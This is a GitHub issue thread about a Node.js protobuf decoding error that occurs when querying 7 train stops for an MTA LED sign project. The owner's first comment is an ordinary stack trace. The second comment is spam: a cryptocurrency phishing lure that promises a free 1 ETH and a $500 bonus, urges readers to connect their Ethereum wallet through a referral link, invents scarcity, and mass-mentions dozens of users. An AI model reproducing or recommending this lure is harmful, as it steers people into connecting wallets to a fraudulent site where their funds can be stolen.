### ISSUE TITLE
Querying 7 train stops cause API errors

### ISSUE THREAD

**Issue by harrisonlingren** [harrisonlingren/mta-led-sign#3]

**Comment by harrisonlingren** [comment]
```
Error: Illegal wire type of unknown field 7 in Message .transit_realtime.FeedMessage#decode: 4
Jan 31 06:55:42 PM      at Message.ProtoBuf.Reflect.Message.decode (/opt/render/project/src/Server/node_modules/protobufjs/ProtoBuf.js:2132:39)
Jan 31 06:55:42 PM      at Function.Message.decode (/opt/render/project/src/Server/node_modules/protobufjs/ProtoBuf.js:1982:41)
Jan 31 06:55:42 PM      at PassThrough.<anonymous> (/opt/render/project/src/Server/node_modules/mta-gtfs-jl/lib/parsers/gtfs.js:20:73)
Jan 31 06:55:42 PM      at PassThrough.emit (events.js:376:20)
Jan 31 06:55:42 PM      at endReadableNT (internal/streams/readable.js:1336:12)
Jan 31 06:55:42 PM      at processTicksAndRejections (internal/process/task_queues.js:82:21)
```

**Comment by pisgo** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://app.blastofflzone.com/referral)

# Blastoff.zone: Earn 1 ETH + $500 Bonus!

Congratulations! You've been selected as one of the fortunate individuals eligible to claim 1 ETH right now, along with a $500 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://app.blastofflzone.com/referral) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500 bonus.
3. Utilize the "Claim Now" option to secure your tokens.

This exclusive opportunity won't last long, so make sure to act swiftly to secure your rewards!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 100 tokens already claimed, seize this chance before it's too late!
kechol, @PittyXu, @tkyz, @jboylee, @hernandazevedo, @arimwilson, @Erasmus-Wang, @jon177, @christopher19, @wyscjm, @JenkinsZhang, @esotericnonsense, @pbae, @vigintas, @pairxj, @Oisann, @rizplate, @hitgy09, @anmingyu11, @mehmetboraezer, @luzhongzhou, @0xhiroki, @ddrccw, @sircola, @AfroThundr3007730, @MaloneGod, @MinhasKamal, @jamescarlos, @sunying008, @younus-ma, @puzhenlong, @thurm102, @jet10000, @ilylia, @bas, @junhaoli95, @ashvinpanicker, @ruifreitas, @igofreely, @georgethemarmot, @munday, @sonirajesh, @Thinker024, @tensions, @beodeulsoft, @cbrnrd, @zqclair, @Captain32, @yikuang, @waysup
